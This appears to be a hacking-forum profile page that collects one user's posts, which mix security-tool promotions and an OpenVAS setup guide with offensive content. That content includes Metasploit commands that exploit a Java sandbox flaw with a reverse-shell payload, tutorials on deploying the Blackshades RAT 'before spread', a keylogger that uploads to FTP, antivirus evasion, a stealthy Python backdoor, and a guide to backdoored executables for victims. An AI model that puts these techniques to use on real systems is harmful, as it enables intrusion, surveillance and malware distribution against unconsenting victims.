Wubi

Active Members (Posts: 893, Days Won: 17)

Everything posted by Wubi

  1. Today we're gonna be using a classic method to escalate privileges on a fully patched Windows box. Of course, we'll be using none other than the Python server & shell for the whole process. The reason for demonstrating this sole method is simple: privilege escalation methods/exploits vary from time to time and although some operating systems (especially the no longer supported ones) have specific exploits that work, current operating systems are constantly being patched... which leads security researchers to develop new exploits, which leads to new patches, etc... on that note, let's get started! Click here to read full article: Download BypassUAC from: TrustedSec - Information Security Made Simple Source: YouTube
  2. Use Nessus to scan for both known and previously unknown web application vulnerabilities. Source: YouTube
  3. Chip.de is giving away full version copies of WinSysClean X2, worth $29. So hurry and grab it. WinSysClean automatically optimizes the Windows operating system by removing unused and temporary files, invalid and unnecessary registry entries, unused shortcuts, and much more. WinSysClean uses complex analysis algorithms and includes over 84 cleaning and repair functions. WinSysClean also includes practical Windows tuning features, such as generating desktop shortcuts for useful Windows functions.

    Key Features of WinSysClean X2:
    • Windows Repair and Registry Cleaning
    • Optimize PC Performance
    • Windows Tuning
    • User-friendly interface
    • For Windows XP, Vista, 2003, 2008 Server, and Windows 7 (32 & 64-bit)

    Follow the steps below to grab a free copy of WinSysClean X2. Click here to visit the promo page of WinSysClean X2. Enter your name and a valid email address; you will receive an email from no-reply@usro.de with a confirmation link. Click on the confirmation link. Copy the serial key and note it down for further use. Source: PenTestIT
  4. ubuntu 12.4

    For Skype: cd /tmp && wget -O skype-ubuntu_4.0.0.8-1_i386.deb http://www.skype.com/intl/en-us/get-skype/on-your-computer/linux/downloading.ubuntu32 && sudo dpkg -i skype-ubuntu_4.0.0.8-1_i386.deb

    You already have "Task Manager" under the name "System Monitor". Also run sudo apt-get update && sudo apt-get upgrade, and then sudo apt-get -f install.
  5. Intro to XSS and the Reflected Attack: this video shows other methods used to inject reflected cross-site scripting. Source: Vimeo
  6. You don't even master your mother tongue, what chances would you have against an operating system?
  7. This release adds an update to the Java Applet attack for native 0day Java exploits. Note that when the victim clicks cancel, the exploit still triggers. This is intentional. Source: Vimeo
  8. Etherwall is a free and open source network security tool that prevents Man in The Middle (MITM) through ARP Spoofing/Poisoning attacks. It also protects against various attacks such as Sniffing, Hijacking, Netcut, DHCP Spoofing, DNS Spoofing, WEB Spoofing, and others.

    Features of Etherwall:
    • Daemon Processing
    • ARP Packet Filtering
    • Point to Point & Point to Multipoint Protection
    • Realtime Protection
    • System Logging
    • Early Warning
    • Support for networks configured Statically, Dynamically, or Both
    • Support for Ethernet Wired & Wireless interfaces (IEEE 802.3 & IEEE 802.11)
    • Plugins / Tools Included
    • Man Pages
    • Easy to Use and Free

    Etherwall is a small and handy tool to install, and once you install it… forget it, just keep a watch on the logs. Download Etherwall: etherwall-1.0.BETA3.tar.gz Source: PenTestIT
  9. Description: Vulnerability found exploited in the wild and discovered by Michael Schierl. First details of the vulnerability on 2012-08-26. Source code of the vulnerability provided by jduck on 2012-08-26. Metasploit PoC provided on 2012-08-27. PoC provided by: Unknown, jduck, sinn3r, juan vazquez.

    Reference(s): CVE-2012-4681, OSVDB-84867, BID-55213, "Zero-Day Season is Not Over Yet", "Java 7 0-Day vulnerability information and mitigation".

    Affected versions: Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and previous. Tested on Ubuntu 12.04 with: Firefox & Oracle JSE 1.7.0_06-b24.

    Description: This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

    Metasploit demo:
    use exploit/multi/browser/java_jre17_exec
    set SRVHOST 192.168.178.100
    set TARGET 2
    set PAYLOAD linux/x86/meterpreter/reverse_tcp
    set LHOST 192.168.178.100
    exploit
    sysinfo
    getuid

    Source: YouTube
  10. https://www.youtube.com/watch?v=_GatrcgVWCo&feature=g-u-u Perkongsian Ilmu Komputer | computer knowledge sharing: RAT. How to properly set up Blackshades RAT to give control via a supported phone. My cheap phone does not support an internet browser, so I simulate it using a VPS. The same procedure indeed. Other great tutorials are available at Perkongsian Ilmu Komputer | computer knowledge sharing: RAT. Source: YouTube
  11. http://www.youtube.com/watch?v=XMq-K-Fv18c Perkongsian Ilmu Komputer | computer knowledge sharing: Advance Test Your RAT Server Working Perfectly Before Spread. Did you face these problems with your RAT server:
    ~ it does not get a connection to the host after being executed
    ~ it loses the connection after the victim PC reboots
    You must run particular tests, which involve:
    ~ Test that the server works after execution
    ~ Test the inbound / outbound server connection
    ~ Check startup
    ~ Check that the server is properly installed
    For details and the tool download regarding this video, see this site: Perkongsian Ilmu Komputer | computer knowledge sharing: Advance Test Your RAT Server Working Perfectly Before Spread. Source: YouTube
  12. WinZip Courier is worth $24.95; download it for free and experience the easiest way to compress and email large files. Zip, encrypt, and safely deliver large files without skipping a beat! Simply write an email, attach as many files as you need, and click Send; Courier will take care of the rest.

    Features of WinZip Courier:
    • Reduce email transmission times, bandwidth consumption, and storage space requirements
    • Perform fast and efficient network-based installations with MSI
    • Automatically enforce your organization’s password policy
    • Control the compression and encryption methods used by your employees
    • Comply with security and privacy requirements with one simple, cost-effective solution
    • Automatically zip large attachments into smaller, manageable packages that deliver faster and cause fewer issues. Files still too big? Courier can send up to 2GB per message via the ZipSend web service.

    Sharing large files doesn’t have to be complicated! Don’t waste time configuring shared folders or learning new file delivery tools. Courier integrates seamlessly with your own email system so you can share files the way you always have. Follow the steps mentioned below to grab free WinZip Courier 3.5: Click here to visit the promo page of WinZip Courier 3.5. The download link and license key are provided on the page. Source: PenTestIT
  13. In this episode of TekTip we take a look at the recent Backtrack release BT5 R3. While we list all of the new tools and updates, we look specifically at and demo inundator, cutycapt, rainbowcrack, twofi, uber harvest, jigsaw, and urlcrazy.
    • inundator - intrusion detection false positives generator
    • cutycapt - batch screenshots to be taken of web pages
    • rainbowcrack - crack hashes with rainbow tables
    • twofi - take multiple search terms and return a word list sorted by most common first
    • uberharvest - crawl through the website (and all the links within that website) searching for valid email addresses
    • jigsaw - enumerating information about a company's employees. It is useful for Social Engineering or Email Phishing
    • urlcrazy - Generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage.
    *Full update list and description at TekDefense.com -1aN0rmus Source: YouTube
  14. Part 16 of the Sqli-labs series, based on error-based SQL injections, blind injection of the boolean type and the time-based type. This video is using POST-based BLIND injections, time based and boolean based. Link to part 1: Link to part 2: Link to part 3: Link to part 4: Link to part 5: Link to part 6: Link to part 7: Link to part 8: Link to part 9: Link to part 10: Link to part 11: Link to part 13: Link to part 14: Link to part 15: website: http://dumy2dummies.blogspot.com sources: https://github.com/Audi-1/sqli-labs
  15. This is a Remote Keylogger Add-on for Mozilla Firefox. It will automatically upload the key logs to a specified FTP host. This is a product under development and this is a preview video.
  16. This tutorial will explain how to make your executable undetectable by anti-virus using PEScrambler, a tool presented at DEFCON 16. Source: YouTube
  17. Today I am going to be demonstrating how to use a free dynamic DNS solution for our Python backdoor. Reasons to use such a service vary, like keeping a hostname reachable if you have a dynamic IP address, adding an extra layer of stealthiness to our current shell, or simply to stare at Wireshark and see what happens -- my favorite channel! Let's do thisssss! Click here to read full article: Python Backdoor – Dynamic DNS | Technic Dynamic Click here to check out mystcaster's blog: Pirater comme un nul(l) Source: YouTube
  18. Credits go out to milw0rm movies.... Source: YouTube
  19. Recently, Artillery version 0.6 was released! This release starts the evolution of Artillery, and the launch of Project Artillery. Project Artillery will be getting some major releases in the next few months, starting with the launch of ATIF, the Artillery Threat Intelligence Feed. ATIF is a collection of Artillery servers customized and deployed around the world. They automatically feed attacker IP addresses back instantly to the main Artillery central repository, from where they are pushed out to the main TrustedSec website.

    Official Artillery 0.6 change log:
    • fixed a bug in remove_ban that would not remove the ip address
    • added threat intelligence feed – this is an automatic feed that will pull from trustedsec webservers around attacker IP addresses
    • added ability to automatically block based on intelligence feed
    • daily checks added to banlist
    • fixed a bug when uninstall would not properly kill artillery
    • added a check in the uninstall to see if artillery is actually running
    • added some enhancements to the honeypot banning
    • added new flag for intelligence feed in the config file
    • added the ability to change threat feeds to a different server of your choice
    • added threading to reloading the IP tables matrix, was causing a hang on other imports
    • removed 3306 as a standard port, would cause conflicts at times if it was already installed
    • added the ability to specify the threat intelligence feed server
    • added the ability to configure your own threat intelligence feed server
    • added ability to change the public directory for the HTTP server
    • added ability to configure multiple threat feeds, can pull in multiple Artillery servers

    Artillery version 0.6 now enables ATIF as well as starting your own ATIF servers. You can now place ATIF servers out on the Internet and point your other Artillery installations to them if you do not want to use the TrustedSec repositories.

    Download Artillery: Artillery 0.6 can be downloaded from the SVN at the following link: svn co / - Revision 1479: /artillery artillery/ Source: PenTestIT
  20. OpenVAS is also known as the Open Vulnerability Assessment System. This is a vulnerability assessment tool like others (Nexpose, Nessus, Acunetix, Web Application Attack & Audit Framework, Core Impact, IBM Rational Scan, WebInspect), but it’s free software. All OpenVAS products are free software. The latest version is 5.0, released in May 2012. OpenVAS was initially named GNessUs, as a fork of the Nessus security scanner to allow future free development of the now-proprietary tool. It was first published by a pen tester at Portcullis Computer Security and it was again published by Tim Brown on Slashdot.

    Suppose you are a system admin, IT manager or security engineer and you need to protect your company’s computer or network. Then you are the person who knows all the weaknesses, or we can say vulnerabilities. A key factor in successfully finding and exploiting vulnerabilities in remote / local systems is the amount of information you have in hand. Another key factor is hard work; if you rely solely on vulnerability scanners to do your work for you, you’re certain to miss many interesting and critical security holes. Vulnerability scanners can be very expensive, like Core Impact. Nessus (which used to be free) is now a paid subscription-based service, and other scanners such as SAINT are not too cheap either. Core Impact is awesome, even brilliant software, well worth purchasing if you are a professional pen testing company with lots of clients, but some small companies can’t even consider Core Impact. So thanks to open source software, OpenVAS is to the rescue. OpenVAS is another brilliant vulnerability scanner. Configuration of OpenVAS is a bit of a pain in the head but is well worth the hard effort. Here we take a look at the basic setup process, how to use OpenVAS on Backtrack 5 and some scanning types. Kindly go through the process very carefully.

    Installing OpenVAS: The easiest way to install all required plugins of the OpenVAS suite is to issue the following commands in a terminal window. OpenVAS is a good package that holds all information required to download automatically and be ready as a full suite tool.

    Menu entries of OpenVAS: After the “apt-get install openvas” command you can see that OpenVAS has been installed, and find all the menu entries in this location.

    Configuration of OpenVAS: Adding a new user: from the menu bar (list of OpenVAS) select AddUser and follow the instructions. There are some rules for the user which is admin in Backtrack, i.e. root. “Openvassd has a rules system which allows you to restrict the hosts that root has the right to test.” Like administrator in a Windows system. Here we have to give a password that we assign to the root user/account. Suppose the user is not an administrator; then we can write some rules for the user, and after completing the rule writing session press “ctrl+D” to exit. Here you can see that after pressing ctrl+D it shows us the login user (root) and the password in asterisk format, and last but not least the rules, which we have not created here.

    OpenVAS check setup is a very important tool. While running it checks for problems and gives you advice on how to fix them if necessary. openvas-check-setup -> tests the completeness and readiness of OpenVAS-4. It checks step by step, checking the OpenVAS scanner… OpenVAS Scanner version 3.2.3. Then it shows us what error exists and how to fix it. Like in the screenshot below, which shows “Error: No CA certificate file of OpenVAS scanner found.” And how to fix it: Run ‘openvas-mkcert’. After giving a suggestion to fix this basic error, a final error is shown: “Error: Your OpenVAS-4 installation is not yet complete!” At the same time it asks us to provide feedback and report wrong results to help them improve the check routine.

    OpenVAS Mkcert (process to create a certificate): this process creates the SSL certificate used by OpenVAS. It is mandatory; if you think “what is the need of an SSL certificate?” then you should know that without mkcert you can’t go to the next step. For creating a certificate it will ask you about your time zone, city and your organization, along with some questions about how many days it will be valid, etc. The questions are easy, just write the answers correctly. As soon as we create our certificate we can later use these files from the following paths:
    Certification Authority: Certificate = /usr/local/var/lib/openvas/ca/cacert.pem, Private Key = /usr/local/var/lib/openvas/private/ca/cakey.pem
    OpenVAS server: Certificate = /usr/local/var/lib/openvas/ca/servercert.pem, Private Key = /usr/local/var/lib/openvas/private/ca/cakey.pem

    OpenVAS NVT sync: This process is just like updating Metasploit for the latest updates, exploits and even payloads. After the NVT sync we will get the entire set of scanner tests that we will use for scanning. We need to do this process regularly for better results. When we start the NVT sync process, the system updates all NVTs for scanning, which takes time depending upon your Internet connection. In the updating process it uses a script for synchronizing an NVT collection with the ‘OpenVAS NVT feed’. We can find NVTs on the local system in “/usr/local/var/lib/openvas/plugins”, and at the same time it also uses wget. Wget is software for downloading and crawling web sites. If you want to use wget, then you can find it on your local system at “/usr/bin/wget”. You can manually download NVTs from “http://www.openvas.org/openvas-nvt-feed-current.tar.bz2”. After updating NVTs it will show the screen below: this screenshot shows which NVTs are updated and what they are. As I said earlier it takes time as per your Internet connection, so wait for the update.

    Start OpenVAS scanner: We updated our basic scanner package, so it will take some time to recollect it all and to check for and load new NVTs. When we download a newer NVT then we add it to the list. After starting the OpenVAS scanner it takes time to load all plugins… All plugins loaded.

    Start OpenVAS manager: The first thing we need to do is make a client certificate for OpenVAS manager; this is done by clicking on Start OpenVAS Manager in the menu or with the following command: “openvas-mkcert-client -n om -i”. As soon as we give the above command it generates an RSA private key that is 1024 bits long. All the given information for the certificate is used here. After writing the above command the cert for the client has been created. Now we need to rebuild the database as it is now out of date with the newly added NVTs. If we do not rebuild the database then we might face an error. Rebuild command for openvasmd: openvasmd --rebuild. Obviously this will take some time to update the version information and database, so be patient.

    Start OpenVAS administrator: configuration of the administrator is a really big deal, so be careful about this. We need to create an administrator user that we will be using to perform all of our vulnerability assessment activities. Command for configuration of the administrator user: openvasad -c 'add_user' -n openvasadmin -r admin. As we all know about the admin user and password, we need to remember them for the next use. So enter the proper username and password. After giving the command for creating the user it updates its database with the username and password, and no rule file is updated.

    Start OpenVAS Manager: Now it’s time to start OpenVAS manager. I am using a local system for all services, 127.0.0.1, known as the loopback IP address. Command for manager: “openvasmd -p 9390 -a 127.0.0.1”.

    Start OpenVAS Administrator: Command to start the administrator on the local machine: openvasad -a 127.0.0.1 -p 9393.

    Start Greenbone Security Assistant: Time to start the next service, Greenbone Security Assistant. This again runs as a daemon in the background. Again we use our local loopback IP. Command for Greenbone Security Assistant: “gsad --http-only --listen=127.0.0.1 -p 9392”.

    Congratulations! You have completed the installation process. I know it seems difficult, but it’s worth it when we use OpenVAS for scanning.

    OpenVAS user interfaces: Greenbone Security Desktop: now it’s time to start the user interface for scanning the product and daemons. This is the user interface; now you can use this as a scanner. It is open source and because of this reason we find lots of vulnerabilities in our product. Web interface: The web interface is the next method or approach to log in and use to scan web applications, like a scan for vulnerabilities. Open a browser and enter the following address: 127.0.0.1:9392. Then it shows you the login screen of a web application. But remember, once you log in using a web browser your CPU usage goes through the roof and sometimes your system gets stuck for a while, so be patient. With reference to the above screenshot, after a successful login, in the left hand side bar you can see some options like tasks, new task, notes, overrides, and performance, which are all related to scan management. The next and main thing is configuration, which is really important and I know you will learn this part by yourself. Some rough ideas about this are: scan config for configuring scan types, config for which kind of target you have in target options, sometimes we need credentials to scan (web page login, system user name & password), and we can schedule our tasks. All the best for your OpenVAS (Open Vulnerability Assessment System). Let me know if you need any assistance with it. Source: InfoSec Resources
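A post-install check for the daemon layout the walkthrough above ends with, added here as an example that is neither the post's nor OpenVAS's own code. It parses ss -ltnp style output (a constructed sample below) to confirm that openvasmd (9390), gsad (9392) and openvasad (9393) are bound to 127.0.0.1 only, and flags private key files that other users can read; the port-to-daemon mapping follows the post, while the ss layout and the key file names cakey.pem/serverkey.pem are assumptions.

```python
"""Sanity check for an OpenVAS 4 setup bound to loopback, as in the post above.

Added example, not part of the original post or of OpenVAS. Two checks:
1. every expected daemon listens, and only on the loopback address;
2. private keys created by openvas-mkcert are not group/world readable.
"""
import os
import re
import stat
import tempfile

# Port -> daemon, exactly as the walkthrough starts them (all on 127.0.0.1).
EXPECTED_LISTENERS = {9390: "openvasmd", 9392: "gsad", 9393: "openvasad"}

# Constructed sample in `ss -ltnp` layout; openvasad is deliberately exposed.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN  0      128    127.0.0.1:9390      0.0.0.0:*         users:(("openvasmd",pid=1201,fd=5))
LISTEN  0      128    127.0.0.1:9392      0.0.0.0:*         users:(("gsad",pid=1305,fd=6))
LISTEN  0      128    0.0.0.0:9393        0.0.0.0:*         users:(("openvasad",pid=1250,fd=4))
"""

# LISTEN, recv-q, send-q, then "addr:port"; addr may be IPv4 or a bracketed IPv6.
LISTEN_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s")


def parse_listeners(ss_output):
    """Return {port: local_address} for every LISTEN line in ss -ltnp output."""
    listeners = {}
    for line in ss_output.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            listeners[int(m.group(2))] = m.group(1)
    return listeners


def exposed_daemons(ss_output, expected=EXPECTED_LISTENERS):
    """Map daemon name -> problem for daemons missing or not bound to loopback."""
    listeners = parse_listeners(ss_output)
    problems = {}
    for port, name in expected.items():
        addr = listeners.get(port)
        if addr is None:
            problems[name] = "not listening"
        elif addr not in ("127.0.0.1", "[::1]"):
            problems[name] = "bound to %s, not loopback" % addr
    return problems


def world_readable_keys(paths):
    """Return the private-key paths whose mode grants group or other read."""
    bad = []
    for p in paths:
        mode = os.stat(p).st_mode
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            bad.append(p)
    return bad


def demo_key_check():
    """Create two constructed placeholder key files and report the weak one."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "cakey.pem")       # assumed name, mode 0600
        bad = os.path.join(d, "serverkey.pem")    # assumed name, mode 0644
        for p in (good, bad):
            with open(p, "w") as fh:
                fh.write("-----BEGIN PRIVATE KEY----- (constructed placeholder)\n")
        os.chmod(good, 0o600)
        os.chmod(bad, 0o644)
        return [os.path.basename(p) for p in world_readable_keys([good, bad])]


if __name__ == "__main__":
    for name, why in sorted(exposed_daemons(SAMPLE_SS_OUTPUT).items()):
        print("WARNING: %s %s" % (name, why))
    print("world-readable keys:", demo_key_check())
```

On a live box, feed the real output of `ss -ltnp` (or `netstat -ltnp` reformatted) to exposed_daemons and the two key paths from the post to world_readable_keys.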
  21. It’s a well-known saying that gathering maximum information about the enemy is half the work done in defeating him. The same holds true when you are about to attack a target (a potential victim); the first step is to gather as much information as possible. Information gathering can be broadly classified into two categories – Active and Passive. In an active reconnaissance phase, you probe the target directly to reveal information, and in passive reconnaissance, the attacker tries to extract information indirectly. Generally an attacker tries to seek information about the Domain Name, Network Blocks, system architecture and system enumeration via the Internet. For gaining remote access into the victim’s PC, he would also seek information about authentication mechanisms. If the attack is happening within the network, the information under siege would be network protocols, TCP and UDP services, system enumeration, and general network topology and architecture. So usually the network range is determined initially, which is then followed by discovering open ports on the target. Following this, the enumeration of services, users, workgroups, etc. takes place. Let’s start from the basics, and then proceed to the advanced tools in this article.

    Who.is: A very well-known tool to almost all the techies in the world, WHOIS can reveal the initial information about the target organization, which can help us launch a social engineering attack on the victim. Let’s look into the various types of information that we can possibly unearth via this tool. In the above-mentioned screenshot, we get very important initial information about the organization being queried here. We get the geographic location of the organization along with its IP address and we are also able to know the server type that is running on the target. Looking further, now comes the interesting part. We get to see the administrative and technical contact details, and over here the email ID given seems to be the personal ID, which reveals the name of the person too. We get the fax, telephone, and complete address of the contact person. Following this, we also have information about the name servers used by the organization.

    GHDB – The Google Hacking Database, an initiative by Exploit-DB: Google is the biggest tool any attacker can possess. Besides simple searching, Google provides advanced keywords to be used in the search terms. These terms are known as Google Dorks. Exploit-DB has collected all these dorks in one place and named it the GHDB. What can possibly be unearthed from these? Here they are: vulnerable servers and files over the Internet; files containing passwords and usernames; login portals; various online devices like cameras, PC clients, etc.; advisories and vulnerabilities.

    Nmap Tool: In the previous two phases we saw how to gather as much information as possible about the target. Next, we will discuss a tool called Nmap – an acronym for Network Mapper; it helps to scan for open ports, open services, operating systems, etc. Various commands are used such as -sV, -O, -PO, which stand for service identification, banner grabbing, and port open and close. The -sV command takes more time than other commands as it scans through the services, ports, open/close status, and also the vendor name. With this we get the network range, we get to know the ports and services, which leads us to the next phase called vulnerability assessment/research. In the above screenshot, the Nmap scanner shows whether the host is alive or dead. This also shows the open ports and the protocol used by them. We infer that the ports 135, 139 and 445 are open in the TCP mode. It’s a well-known fact that an unpatched XP machine is vulnerable to MSRPC DCOM exploitation and also NetBIOS exploitation. The above command in Nmap demonstrates the services run by each port and their versions. It also shows us the operating system info. On the other hand, the -O command in Nmap gives only the OS information.

    Vulnerability Assessment (VA)/Research: In this phase we look into all possible vulnerabilities and 0days with respect to the results obtained in the network scanning phase. Various online resources such as exploit-db.com and 1337day.com can be used to look into the 0days and vulnerabilities and their patch status. Jargon alert: 0day (Zero-day): A vulnerability that is not patched/addressed by the vendor. So, considering the above scenario, when we search for Windows XP on the exploit database, we find a large number of vulnerabilities. It’s up to us now to find a close match and verify if the above-mentioned vulnerabilities exist in the remote system. This work can be done easily by using a framework called Metasploit, to be discussed in the following section. From the VA research phase we move on to perform the attack. This attack depends totally on the previous two phases discussed above. We perform attacks using a piece of code known as an exploit. We perform post-exploitation tasks using snippets of code called payloads. The Metasploit development framework is one of the best exploit development frameworks, developed in Ruby. It contains a huge list of payloads and exploits for performing an attack. As you can see, from the exploit database we cross-checked to find that an RPC DCOM buffer overflow vulnerability exists in an unpatched Windows XP. Thus, we searched for the exploit in Metasploit, which makes our task easy by automating the exploitation process. From here we go around setting payloads and exploiting the system.

    Backdoors and Malware for Maintaining Access: As an attacker I wouldn’t want to be doing all these phases again and again, and I would prefer to maintain access on the target. This is achieved by the use of binders and backdoored executables. We’ll see how a backdoored executable can be created using the Metasploit framework. This approach uses the classic social engineering tactic to make the victim voluntarily download and open the file. The skill required to do this is left to the creativity of the attacker. This creates the backdoored executable. Assume that the social engineering succeeds, and the victim opens your executable: then I run this server on my attacker machine to listen for the connection from the victim when he clicks it. As soon as he clicks on the executable and runs it, a meterpreter is opened on the attacker server and the system is owned, as shown in the previous figure. Thus we can make use of backdoored executables in our attacks using the Metasploit framework.

    Malware for Making Money: Over the years the Internet has evolved with many money-making affiliate programs. Hackers try to maintain a large network of computers which automatically installs and indirectly earns a considerable income for the attacker. Jargon alert: Botnet: A huge number of computers run with a command and control server which sends instructions to the other computers in the network. These computers reply back and send/carry out operations as instructed by the C & C server. This large network of computers is called a Botnet.

    Web Application Attacks: Web applications can be footprinted using the WhatWeb tool on the Backtrack machine. This tool provides details about the IP address, server operating systems, and domain-specific information. Post vulnerability research phase, web application attacks are of various types. A few famous ones include: SQL injection, Cross-site scripting (XSS), and CSRF. See WhatWeb in action: This tool shows us the geographic location, IP address, HTTP server being run on the target, CMS, and other kinds of information which play a crucial role in web application analysis and reconnaissance.

    This article provides basic information regarding the various ways in which exploitation is carried out. We have revisited the hacker cycle with shades of gray to the article. There are more tools available out there which are ready for some action. The knowledge of hacking isn’t something that gets you money or steals credentials. It simply means knowing your system in and out – its weaknesses and rectifying them to secure yourself from malicious people. Source: InfoSec Resources
  22. Most of us own multiple computers, hard disks and removable drives, so it would make perfect sense to have a universally accessible combined data storage pool. The free utility software Greyhole does exactly that. Some Greyhole usage statistics: the average Greyhole pool size is 6.4TB and contains 5 drives. The biggest one has 43TB and uses 26 drives. The average Greyhole user uses his pool at 67% of its capacity. In the backend, Greyhole uses Samba to create a storage pool of all available hard drives, allowing users to create redundant copies of their files, preventing data loss when part of their hardware fails. Users can add and configure as many disk drives (internal, external, USB, e-SATA, FireWire) as they wish in their storage pool, whose resulting size will be the sum of the total free space in all the included disk drives. Greyhole file copies are regular files, visible on any machine, without any hardware or software required. If you take out one hard drive from your pool and mount it anywhere else, you’ll be able to see all the files that Greyhole stored on it. They will have the same filenames, and they’ll be in the same directories you’d expect them to be. Video tutorial on Greyhole. Download Greyhole: Greyhole v0.9.22 - Greyhole Source: PenTestIT